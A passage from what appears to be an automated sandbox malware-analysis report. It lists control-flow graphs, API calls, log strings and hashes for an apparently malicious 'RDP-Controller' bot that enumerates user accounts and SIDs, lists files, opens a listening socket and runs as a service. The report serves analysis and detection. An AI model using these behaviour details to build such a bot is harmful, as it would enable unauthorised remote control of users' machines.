62265->62269 62266 7ff6be038aa7 62270 7ff6be038563 383 API calls 62266->62270 62280 7ff6be038bc0 62269->62280 62270->62278 62271 7ff6be038a3f 62289 7ff6be0389aa 13 API calls 62271->62289 62273 7ff6be038a44 62274 7ff6be038a4c 62273->62274 62275 7ff6be038c3b ExitProcess 62273->62275 62279 7ff6be038a6b 62274->62279 62290 7ff6be0381e0 SetServiceStatus 62274->62290 62276 7ff6be038bd6 62281 7ff6be0399e2 6 API calls 62276->62281 62277 7ff6be038bff 62277->62275 62278->62277 62282 7ff6be038a1b 62278->62282 62286 7ff6be0381e0 SetServiceStatus 62278->62286 62280->62276 62284 7ff6be03886d 25 API calls 62280->62284 62281->62282 62282->62263 62287 7ff6be0381e0 SetServiceStatus 62282->62287 62284->62280 62285->62266 62286->62265 62287->62263 62288->62271 62289->62273 62290->62279

                                                                                                                                                  Executed Functions

                                                                                                                                                  Function 00007FF8B91538C3 Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 332memoryCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 799 7ff8b91538c3-7ff8b91538d9 call 7ff8b9151292 802 7ff8b9153d3e-7ff8b9153d42 799->802 803 7ff8b91538de 802->803 804 7ff8b9153d48-7ff8b9153d66 GetProcessHeap HeapAlloc 802->804 805 7ff8b91538e3-7ff8b91538e8 803->805 804->805 806 7ff8b9153d6c-7ff8b9153d82 call 7ff8b9151292 804->806 807 7ff8b91538ee-7ff8b91538fe LocalAlloc 805->807 808 7ff8b91539d4-7ff8b91539d9 805->808 806->805 810 7ff8b9153902-7ff8b9153907 807->810 808->810 812 7ff8b915390d-7ff8b915398b wcsncpy call 7ff8b915a05a LookupAccountNameW 810->812 813 7ff8b9153cb9 810->813 819 7ff8b915398d-7ff8b915398f 812->819 820 7ff8b91539de-7ff8b91539ea GetLastError 812->820 814 7ff8b9153cbe-7ff8b9153cc9 813->814 816 7ff8b9153ccf-7ff8b9153cd1 814->816 817 7ff8b9153d87 814->817 816->817 821 7ff8b9153cd7-7ff8b9153d38 wcslen GetProcessHeap HeapAlloc 816->821 822 7ff8b9153d8d-7ff8b9153d95 817->822 823 7ff8b9153b84-7ff8b9153b9c ConvertSidToStringSidA 819->823 824 7ff8b9153995-7ff8b91539b6 GetLastError call 7ff8b9151292 819->824 827 7ff8b91539ec-7ff8b91539ff call 7ff8b9151292 820->827 828 7ff8b9153a01-7ff8b9153a19 LocalAlloc 820->828 821->799 821->802 825 7ff8b9153d9c-7ff8b9153dac 822->825 826 7ff8b9153d97 NetApiBufferFree 822->826 829 7ff8b9153b9e-7ff8b9153ba5 823->829 830 7ff8b9153bd5-7ff8b9153bf9 GetLastError call 7ff8b9151292 823->830 851 7ff8b91539bc 824->851 852 7ff8b9153bfb-7ff8b9153c01 824->852 834 7ff8b9153ed7-7ff8b9153ede 825->834 835 7ff8b9153db2-7ff8b9153db4 825->835 826->825 827->824 832 7ff8b9153a1f-7ff8b9153a51 LookupAccountNameW 828->832 833 7ff8b9153b7a 828->833 838 7ff8b9153bab-7ff8b9153bd0 call 7ff8b9151292 829->838 839 7ff8b9153c81-7ff8b9153c86 829->839 830->829 841 7ff8b9153a61-7ff8b9153a82 GetLastError call 7ff8b9151292 832->841 842 7ff8b9153a53-7ff8b9153a5c LocalFree 832->842 833->823 845 7ff8b9153f1d-7ff8b9153f36 call 7ff8b9151292 834->845 846 7ff8b9153ee0-7ff8b9153ee2 834->846 835->834 844 7ff8b9153dba-7ff8b9153e24 NetUserEnum 835->844 838->814 839->814 869 7ff8b9153a9c-7ff8b9153aa2 841->869 870 7ff8b9153a84 841->870 842->819 844->822 855 7ff8b9153e2a-7ff8b9153e30 844->855 867 7ff8b9153f38 845->867 868 7ff8b9153f57-7ff8b9153f5d 845->868 847 7ff8b9153ee8-7ff8b9153efe call 7ff8b915379f 846->847 848 7ff8b915402a-7ff8b9154044 call 7ff8b9151292 846->848 877 7ff8b9153f0a-7ff8b9153f1c 847->877 887 7ff8b9153f05 call 7ff8b9151292 847->887 848->877 859 7ff8b9153c7a-7ff8b9153c7f 851->859 860 7ff8b91539c2-7ff8b9153c6a 851->860 863 7ff8b9153c8f-7ff8b9153c94 852->863 864 7ff8b9153c07-7ff8b9153c0d 852->864 855->822 865 7ff8b9153e36-7ff8b9153e6a GetProcessHeap HeapAlloc 855->865 859->814 860->814 863->814 872 7ff8b9153c0f-7ff8b9153c15 864->872 873 7ff8b9153c39-7ff8b9153c3c 864->873 874 7ff8b9153e70-7ff8b9153e7a 865->874 875 7ff8b91538a3-7ff8b91538be call 7ff8b9151292 865->875 878 7ff8b9153f3e-7ff8b9153f4b 867->878 879 7ff8b9153fe2-7ff8b9153fe7 867->879 880 7ff8b9153fec 868->880 881 7ff8b9153f63 868->881 885 7ff8b9153aa8-7ff8b9153aae 869->885 886 7ff8b9153b34-7ff8b9153b39 869->886 883 7ff8b9153a8a-7ff8b9153a97 870->883 884 7ff8b9153b20-7ff8b9153b25 870->884 888 7ff8b9153cab-7ff8b9153cb0 872->888 889 7ff8b9153c1b-7ff8b9153c21 872->889 892 7ff8b9153c3e-7ff8b9153c41 873->892 893 7ff8b9153c4f-7ff8b9153c55 873->893 890 7ff8b9153e7c-7ff8b9153eaf memcpy GetProcessHeap HeapFree 874->890 891 7ff8b9153eb5-7ff8b9153ed2 874->891 875->822 878->868 879->847 909 7ff8b9153ff6-7ff8b9153ffb 880->909 897 7ff8b9153f98-7ff8b9153f9e 881->897 898 7ff8b9153f65-7ff8b9153f68 881->898 883->869 884->842 899 7ff8b9153ae0-7ff8b9153ae6 885->899 900 7ff8b9153ab0-7ff8b9153ab3 885->900 886->842 887->877 888->814 901 7ff8b9153c27-7ff8b9153c2d 889->901 902 7ff8b9153cb2-7ff8b9153cb7 889->902 890->891 903 7ff8b9153c96-7ff8b9153c9b 892->903 904 7ff8b9153c43-7ff8b9153c46 892->904 894 7ff8b9153ca4-7ff8b9153ca9 893->894 895 7ff8b9153c57-7ff8b9153c5c 893->895 894->814 895->814 916 7ff8b9154014 897->916 917 7ff8b9153fa0-7ff8b9153fa6 897->917 910 7ff8b9153f6a-7ff8b9153f6d 898->910 911 7ff8b9153f86-7ff8b9153f8c 898->911 907 7ff8b9153b5c-7ff8b9153b61 899->907 908 7ff8b9153ae8-7ff8b9153aee 899->908 912 7ff8b9153ace-7ff8b9153ad4 900->912 913 7ff8b9153ab5-7ff8b9153ab8 900->913 914 7ff8b9153c5e-7ff8b9153c63 901->914 915 7ff8b9153c2f-7ff8b9153c34 901->915 902->814 903->814 905 7ff8b9153c9d-7ff8b9153ca2 904->905 906 7ff8b9153c48-7ff8b9153c4d 904->906 905->814 906->814 907->842 922 7ff8b9153b66-7ff8b9153b6b 908->922 923 7ff8b9153af0-7ff8b9153af6 908->923 909->847 910->909 924 7ff8b9153f73-7ff8b9153f76 910->924 925 7ff8b9153f8e-7ff8b9153f93 911->925 926 7ff8b915400a-7ff8b915400f 911->926 918 7ff8b9153ad6-7ff8b9153adb 912->918 919 7ff8b9153b52-7ff8b9153b57 912->919 927 7ff8b9153b3e-7ff8b9153b43 913->927 928 7ff8b9153abe-7ff8b9153ac1 913->928 914->814 915->814 920 7ff8b915401e 916->920 917->920 921 7ff8b9153fa8-7ff8b9153fae 917->921 918->842 919->842 920->848 929 7ff8b9153fba-7ff8b9153fbf 921->929 930 7ff8b9153fb0-7ff8b9153fb5 921->930 922->842 931 7ff8b9153af8-7ff8b9153afd 923->931 932 7ff8b9153b70-7ff8b9153b75 923->932 933 7ff8b9153f7c-7ff8b9153f81 924->933 934 7ff8b9154000-7ff8b9154005 924->934 925->847 926->847 927->842 935 7ff8b9153b48-7ff8b9153b4d 928->935 936 7ff8b9153ac7-7ff8b9153acc 928->936 929->847 930->847 931->842 932->842 933->847 934->847 935->842 936->842
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocErrorLastLocal$AccountCriticalHeapLookupNameSection$CopyEnterFileFreeLeaveProcessfflushfwritewcsncpy
                                                                                                                                                  • String ID: D$[D] (%s) -> User found(name=%s,s_sid=%s,acct_expires=%x,last_logon=%x)$[E] (%s) -> ConvertSidToStringSid failed(gle=%lu)$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$sid_to_str$users_sync
                                                                                                                                                  • API String ID: 3624467404-104752423
                                                                                                                                                  • Opcode ID: 2c065d011c9ab7030f9672b503886fd27cb0c5ffb7622794d5e0c854782d74c2
                                                                                                                                                  • Instruction ID: f97704ef0d59d11db3e2192d24c36f60657465927338c1e70d9870f31ebe3acd
                                                                                                                                                  • Opcode Fuzzy Hash: 2c065d011c9ab7030f9672b503886fd27cb0c5ffb7622794d5e0c854782d74c2
                                                                                                                                                  • Instruction Fuzzy Hash: 26F15762A08A82C7EB608F1CE45437963A1EB85BD4F564036DB4E87398DF3DF846E741
                                                                                                                                                  Function 00007FF6BE031CF3 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$ErrorFileLast$CloseFirstNext_mbscpyfflushfwrite
                                                                                                                                                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                                                                                                  • API String ID: 1094913617-243243391
                                                                                                                                                  • Opcode ID: 4479868d61843783ce57a0bb4d40878a2ad77d6bec23207d6b7c491633aae95a
                                                                                                                                                  • Instruction ID: adda9e58ddc3f6a07252838e02f4e407d7d1d81964b9e8de9c4516b0ee891cf2
                                                                                                                                                  • Opcode Fuzzy Hash: 4479868d61843783ce57a0bb4d40878a2ad77d6bec23207d6b7c491633aae95a
                                                                                                                                                  • Instruction Fuzzy Hash: E1613C69E0D54789FB30971CA500BB82260AF7D359F940133FB6EEB2D4DF2CA9658342
                                                                                                                                                  Function 00007FF8BA4F4013 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 159filestringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$ErrorFileLast$CloseFirstNextfflushfwritestrcpy
                                                                                                                                                  • String ID: (name != NULL)$(path != NULL)$(resume_handle != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindFirstFileA failed(path=%s,gle=%lu)$[E] (%s) -> FindNextFileA failed(path=%s,gle=%lu)$fs_dir_list
                                                                                                                                                  • API String ID: 4253334766-243243391
                                                                                                                                                  • Opcode ID: 329fdf8127f5f1158765810408fb89e91592730f77661986c47c59f41f2ff3fe
                                                                                                                                                  • Instruction ID: 9fbea3e9211dbda891c98ddf260b97aa5cdcbbb0fcc86a1b2bbb801f3b3f621b
                                                                                                                                                  • Opcode Fuzzy Hash: 329fdf8127f5f1158765810408fb89e91592730f77661986c47c59f41f2ff3fe
                                                                                                                                                  • Instruction Fuzzy Hash: DD616E36E0C543D5FB205BDDA8C43B922606F523D4F4629B2DF6E572E4EF2EAA448341
                                                                                                                                                  Function 00007FF8B915387F Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 167memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Free$Process$Local$AllocBufferEnumUsermemcpy
                                                                                                                                                  • String ID: [E] (%s) -> Failed(err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> NetUserEnum failed(enum_err=%08lx)$[I] (%s) -> Done(sam_user_num=%u)$mem_alloc$users_sync
                                                                                                                                                  • API String ID: 1361071942-3382179125
                                                                                                                                                  • Opcode ID: 12def299df3458bcfa48338576adbcb56069ab18652fada285a8cab9ade52bd0
                                                                                                                                                  • Instruction ID: d1b092fe55e559ef2bf61db313e48846db6f1cf5b48348ad783265ac7f33d98f
                                                                                                                                                  • Opcode Fuzzy Hash: 12def299df3458bcfa48338576adbcb56069ab18652fada285a8cab9ade52bd0
                                                                                                                                                  • Instruction Fuzzy Hash: 23619322A0C6C796FA219F0CE84037962A1AF857D4F664036DB4D476D0EE3EF886F711
                                                                                                                                                  Function 00007FF8BFB315FA Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 89networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$bindfflushfwritehtonlhtonslistensetsockoptsocket
                                                                                                                                                  • String ID: [E] (%s) -> bind failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> listen failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$tcp_listen
                                                                                                                                                  • API String ID: 3590747132-3524496754
                                                                                                                                                  • Opcode ID: 8525ac4b6cb84a984cd9b15e9deea8171ad707669ffd2c5e67cbfdf704f18dd2
                                                                                                                                                  • Instruction ID: 8e918435d94036e9b3732c56a1de6dcce90be395cb9861e47b3713e66f837817
                                                                                                                                                  • Opcode Fuzzy Hash: 8525ac4b6cb84a984cd9b15e9deea8171ad707669ffd2c5e67cbfdf704f18dd2
                                                                                                                                                  • Instruction Fuzzy Hash: 11318065E8860782EA20AFBDE8001B97794AF497F4F181336EB7E436E5DE3CE4058700
                                                                                                                                                  Function 00007FF6BE038C4A Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 120stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • strcmp.MSVCRT ref: 00007FF6BE038C62
                                                                                                                                                  • strcmp.MSVCRT ref: 00007FF6BE038C75
                                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32 ref: 00007FF6BE038CB1
                                                                                                                                                  • _read.MSVCRT ref: 00007FF6BE038D07
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF6BE038D26
                                                                                                                                                    • Part of subcall function 00007FF6BE0388EE: FreeLibrary.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE03892F
                                                                                                                                                    • Part of subcall function 00007FF6BE0388EE: GetProcessHeap.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE038962
                                                                                                                                                    • Part of subcall function 00007FF6BE0388EE: HeapFree.KERNEL32(?,?,00000000,000002234F5413D0,00007FF6BE038CDE,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8), ref: 00007FF6BE038973
                                                                                                                                                    • Part of subcall function 00007FF6BE0389AA: GetProcessHeap.KERNEL32(?,?,00000000,00007FF6BE038CE3,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE0389DB
                                                                                                                                                    • Part of subcall function 00007FF6BE0389AA: HeapFree.KERNEL32(?,?,00000000,00007FF6BE038CE3,?,?,?,?,?,?,00000001,00007FF6BE038E4A,?,?,00007FF6BE0484F8,00000000), ref: 00007FF6BE0389EC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Free$Processstrcmp$CtrlDispatcherErrorLastLibraryServiceStart_read
                                                                                                                                                  • String ID: RDP-Controller$[E] (%s) -> No a valid run mode(mode=%s)$[E] (%s) -> StartServiceCtrlDispatcherA failed(GetLastError=%lu)$main$service$standalone
                                                                                                                                                  • API String ID: 3617873859-308889057
                                                                                                                                                  • Opcode ID: 42f86d31ba7867ce5e87f8c186e311e3b151731fd0be31e8263105fe58cfcc7b
                                                                                                                                                  • Instruction ID: f055d5472429013256aed81e0dbaa2e6912dfc5e3126da18a2211fb614dc6f37
                                                                                                                                                  • Opcode Fuzzy Hash: 42f86d31ba7867ce5e87f8c186e311e3b151731fd0be31e8263105fe58cfcc7b
                                                                                                                                                  • Instruction Fuzzy Hash: 82514D50E0C70381FB70671DA480BB952A4AF7C345F5418B3FB4EC62E6EE6DE9A58721
                                                                                                                                                  Function 00007FF6BE031131 Relevance: 13.6, APIs: 9, Instructions: 120sleepstringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3714283218-0
                                                                                                                                                  • Opcode ID: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                                                                                                                                                  • Instruction ID: ea8f0220818b1390bd916f2538a1d7f6e5716025ec37fa71180b05483ed0306d
                                                                                                                                                  • Opcode Fuzzy Hash: 423c7fadebe407afcbf8f11926be5113ac1f50ee7c1d89c8a253cd586a538a4a
                                                                                                                                                  • Instruction Fuzzy Hash: 1C513A26A1C65685FB619B5DE954AB923B0AF7C784F044536FF0DC7392DE3CE8218350
                                                                                                                                                  Function 00007FF8B9152A1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastrecv
                                                                                                                                                  • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                                                                                                                                                  • API String ID: 2514157807-65069805
                                                                                                                                                  • Opcode ID: 92f11da0d592137c33acb566b4c1e3a2f431a29a74f25d4b214e2cda57f86371
                                                                                                                                                  • Instruction ID: 6f5303a74057ad607c5b78138d8cd0fc7aeb99e52170f154457bfad031e27db1
                                                                                                                                                  • Opcode Fuzzy Hash: 92f11da0d592137c33acb566b4c1e3a2f431a29a74f25d4b214e2cda57f86371
                                                                                                                                                  • Instruction Fuzzy Hash: DA118C51E0C69381FA216F2DA8406B912106F427E4F529730DA3D9AAE5EF1CF946E300
                                                                                                                                                  Function 00007FF6BE032515 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298fileCOMMON
                                                                                                                                                  Download Yara Rule

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  • Executed
                                                                                                                                                  • Not Executed
                                                                                                                                                  control_flow_graph 0 7ff6be032515-7ff6be032531 1 7ff6be0325c7-7ff6be0325f5 call 7ff6be0399e2 0->1 2 7ff6be032537-7ff6be03253a 0->2 10 7ff6be032722-7ff6be032733 1->10 3 7ff6be0325fa-7ff6be032628 call 7ff6be0399e2 2->3 4 7ff6be032540-7ff6be032544 2->4 3->10 8 7ff6be032546-7ff6be03254a 4->8 9 7ff6be032550-7ff6be032565 fopen 4->9 8->9 12 7ff6be03262d-7ff6be03265b call 7ff6be0399e2 8->12 13 7ff6be03256b-7ff6be032580 fseek 9->13 14 7ff6be032660-7ff6be032689 _errno call 7ff6be0399e2 _errno 9->14 16 7ff6be03273c-7ff6be032749 10->16 17 7ff6be032735 10->17 12->10 19 7ff6be032778-7ff6be032785 call 7ff6be03e478 13->19 20 7ff6be032586-7ff6be0325af _errno call 7ff6be0399e2 _errno 13->20 29 7ff6be03268b-7ff6be032698 14->29 30 7ff6be0326c0-7ff6be0326d4 _errno 14->30 22 7ff6be032abb 16->22 23 7ff6be03274f-7ff6be032760 call 7ff6be0399e2 16->23 17->16 32 7ff6be032787 19->32 33 7ff6be0327b0-7ff6be0327d9 _errno call 7ff6be0399e2 _errno 19->33 35 7ff6be0326f9-7ff6be032707 _errno 20->35 36 7ff6be0325b5-7ff6be0325c2 20->36 38 7ff6be032ac7-7ff6be032ae0 call 7ff6be0399e2 22->38 34 7ff6be032765-7ff6be032777 23->34 29->30 37 7ff6be03270d-7ff6be032710 30->37 39 7ff6be032a9d-7ff6be032aa2 32->39 40 7ff6be03278d-7ff6be032792 32->40 50 7ff6be0327db-7ff6be0327e8 33->50 51 7ff6be03281f-7ff6be032833 _errno 33->51 35->37 36->1 41 7ff6be03271a-7ff6be03271c 37->41 42 7ff6be032712-7ff6be032715 fclose 37->42 38->34 39->37 45 7ff6be032838-7ff6be032850 fseek 40->45 46 7ff6be032798-7ff6be03279d 40->46 41->10 41->38 42->41 52 7ff6be03287a-7ff6be0328a3 _errno call 7ff6be0399e2 _errno 45->52 53 7ff6be032852-7ff6be03285e 45->53 46->45 49 7ff6be0327a3-7ff6be0327ab 46->49 49->37 50->51 51->37 61 7ff6be0328e9-7ff6be0328fd _errno 52->61 62 7ff6be0328a5-7ff6be0328b2 52->62 55 7ff6be032864-7ff6be03286a 53->55 56 7ff6be032902-7ff6be032924 GetProcessHeap HeapAlloc 53->56 59 7ff6be032870-7ff6be032875 55->59 60 7ff6be032ab1-7ff6be032ab6 55->60 56->55 58 7ff6be03292a-7ff6be032940 call 7ff6be0399e2 56->58 58->55 64 7ff6be0329b9-7ff6be0329c8 59->64 60->37 61->37 62->61 65 7ff6be0329ca-7ff6be0329cc 64->65 66 